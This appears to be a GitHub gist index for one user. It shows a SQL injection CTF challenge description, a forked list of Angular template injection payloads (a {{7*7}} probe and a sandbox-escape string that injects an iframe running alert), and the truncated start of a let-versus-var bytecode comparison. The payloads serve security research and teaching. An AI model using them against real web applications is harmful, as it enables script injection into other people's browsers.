Huli aszx87410

aszx87410 / sqlinjection.md
Last active January 11, 2022 13:45
SQL injection

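SQL injection mini challenge

Description

Below are two small SQL injection challenges adapted from real-world cases; they obviously contain SQL injection vulnerabilities.
Getting the flag is not hard, but what I find interesting is "how to get the most information with the fewest requests".
For example, a boolean-based approach only yields true or false per request, so the amount of information is rather small.
If you can use union directly and dump the results, the amount of information is much larger.

So the goal of this challenge is to get the most information with the fewest requests.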

aszx87410 / AngularTI.md
Created August 18, 2021 07:43 — forked from mccabe615/AngularTI.md
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
aszx87410 / README.md
Last active December 8, 2023 21:59
let vs var by investigating the bytecode generated by Node.js

This is a reply to the question raised by @getify on Twitter:

here's a variation on the question... will JS engines exhibit much performance difference between these two loops?

for (var i = 0; i < 100000000; i++) {
   // do some stuff, but not closure
}

for (let i = 0; i < 100000000; i++) {